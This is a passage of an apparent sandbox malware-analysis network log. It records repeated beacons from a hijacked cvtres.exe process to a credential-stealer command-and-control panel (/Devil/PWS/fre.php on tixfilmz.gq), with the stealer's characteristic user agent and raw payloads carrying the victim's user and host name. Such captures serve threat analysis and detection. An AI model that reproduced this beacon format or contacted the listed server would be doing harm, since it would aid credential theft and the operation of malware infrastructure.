                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4f27ad55bbd1-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  48192.168.2.349830188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:16.837785959 CEST1440OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:16.854964972 CEST1440OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:43:16.930457115 CEST1441INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:16 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iFtawzBVjKjfrYrTAXjWWVtSP35trHD4uy6FS8qwT%2FfFHVrEe%2FTc9dBinz2ob3cQ0O7AzKwO63aMtQ1kYprOm2DWU6NovWEIH3GeGDQutnrzD%2FF3T39YT03HJTuHQA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4f364cc69174-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  49192.168.2.349832188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:19.747801065 CEST1484OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:19.767625093 CEST1484OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:43:19.855670929 CEST1485INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:19 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CaS9%2BYgRMKIuYHiYF9PMKotC1%2F7zwSjVypA7MoG8Z03%2FoftZ4IWHbs5M34XcrwMKqLX%2BT6SkCHkTcTD6uxax9JvlNPzGZ1SC7j5Nhhd8ZllZZu9yf4%2Bo7wJ%2F8PtS%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4f487dc29189-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  5192.168.2.349747188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:18.537200928 CEST1035OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:18.554195881 CEST1036OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:42:18.641688108 CEST1036INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:18 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IusO3PS%2BNxKdc1pE1bhnckIxsL5IUfCMg2N0ixhg1CJ8YDJ1sexeannt%2BdOuWAWENyuH9TYSsv6kia7W5E0PwtJhXkXW0Vn8XxMvKbR1Rut7thDprsdBL3x8jct0aw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4dc9eb03bb55-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  50192.168.2.349838188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:24.421880960 CEST1608OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:24.438859940 CEST1608OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:43:24.509193897 CEST1609INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:24 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PzEsNnNOyz3YF3aEBRXvh3K9KQvGcEvnSSCN4vPpTjroe2CdoRvCY3yd5MzLyo0CO%2FPZH15tb2Qp%2FH2lo0amjWieNCoQKt8S5G7oS%2BYRWMj1ca3dBeg96NEOgjMu1g%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4f65af9d901f-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  51192.168.2.349840188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:28.505356073 CEST1688OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:28.522589922 CEST1689OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:43:28.641503096 CEST1689INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:28 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ASF5E3GRXofzWndMoPxJXG8e5UkQSbK%2FlNaMMjDLkTvQbD7nUo3PKgLQLe2AMHiYEUmp8dWmfsoSZL7l%2FP0svRTe1xWq78GppXcYKYNfSWHbL2xjYF8le7h%2BNUvJOQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4f7f2c91bbc5-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  52192.168.2.349843188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:31.924021959 CEST1875OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:31.941167116 CEST1876OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:43:32.031413078 CEST1876INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:32 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YCz4l%2FWMs4%2Ft6T4roGOVmWA1AuqgTgH5jFgyCPcBhZVhhwjFBPrOMeCgA6mijAaE6gGUqOi%2FTliryZUYwdkekasVLPgmGDk%2Fv4wJoZU%2BDunFOkhmcLEolgILAEWyIQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4f948e719bf2-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  53192.168.2.349850188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:33.879384995 CEST1940OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:33.896676064 CEST1941OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:43:33.985601902 CEST1941INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:33 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZxzAqAPs2%2B6wkiZaXBxWxAQ4viYz%2BoQPXsrKgYYoP1o%2FilJWV3JSd4ydT7ciR4Q7LMU%2BteRlLQDJ%2FPfqQgzfvbTkPVa2pbNAYKorn7mnu1JpWy7zcn2XQ%2F2eG5suGw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4fa0c8d09bda-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  54192.168.2.349852188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:38.361572981 CEST8099OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:38.378686905 CEST8100OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:43:38.459871054 CEST8100INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:38 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FhTvEJmUxdlBdtgZfnodLReacuCGVKe2uoOMZPYIPhRqxUJZk7yozeMUpPRCr%2Bno%2BMXmxvqCj1pmNMTB0ZrxKAYncxbZXxFGbxoScHN6nlzyyk7J3BJfEeZnmtjjew%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4fbcdd64bbaf-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  55192.168.2.349853188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:40.660156012 CEST8101OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:40.677138090 CEST8102OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:43:40.763823032 CEST8102INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:40 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gNwebsyEgMDFNhgjG0aRbZLoCte8tvTShOPR1oOzqrpkSBVA%2B8GMne7vTM2AEkRTl8uZA1OYnbLyaLFEiKWFoYzXm0YX9AfMVJ1bZU%2BPZtt1Kjdimycri3H0IvcvVA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4fcb2c189bca-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  56192.168.2.349859188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:42.759258032 CEST8114OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:42.776278019 CEST8114OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:43:42.876914978 CEST8116INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:42 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4RvVy60nLA3v4HrKzZYfrW4%2F3xt%2FiU2kLkJlk74mT%2BhWITlwXhRN8mLONVm9B9%2BpoJPvWSXpKZbbzfthOx3UBUhltFhK9uBRynyAbFJZCed0Vmv0M8SFZqLtCsynNQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4fd8497d9189-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  57192.168.2.349867188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:45.824251890 CEST9805OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:45.841337919 CEST9806OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:43:45.919315100 CEST9808INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:45 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pbflkE4kDEMCE6ymUD403N1kU66oVIP%2F3IVv0%2F5V%2Flzq97z7yxanXvWuJ0G3qXFpIpWgBJ45067X6olyX3AGKL3fenmvhXUS47uSbrWlJx2YiIWIKyESFSExnqX1xA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4feb6a909ba7-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  58192.168.2.349875188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:47.334573030 CEST9822OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:47.351474047 CEST9822OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:43:47.447091103 CEST9823INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:47 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VaUye4N1FNqUlwpBToxQO7gC5LHWHfn%2Fr2K2nOqmQYNTaFvaW7EMwrHDZUuO0kFWYbzEazhFdrNGB0hYcDJvRXYn6FK%2Fr4JSI3k2qfDn3u%2BSwtdXQrZk4fiIQWHIBQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4ff4dc5cbbc2-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  59192.168.2.349879188.114.96.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:48.403290033 CEST9833OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:48.420222044 CEST9833OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:43:48.498898983 CEST9834INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:48 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lQFtwGGU3Dkg98O%2BQCp%2FzXuHQRQFBA4HyDpgZtFCPViawmosXQH71RqlUE19EbzNIVbeLBILNkUCH%2BKqp1baijUopAMHfIOgdYQNUi3TzDIaGl7BAcxGWoTEbPx5Gw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4ffb8eff924f-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  6192.168.2.349748188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:19.613256931 CEST1037OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:19.630528927 CEST1037OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:42:19.732111931 CEST1038INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:19 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=56rajt1WPGe6KnsyYpZpLkWvcP2gK8oIufFApjC%2FlsRIRyLWAm0lgxAy74kgONnMisbKHxHnGCoj54gIwS1elPMY2YeNpmVi5jQ8TAhhFOqYDjKiWLZCRQTUqZHBNg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4dd09aad6940-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
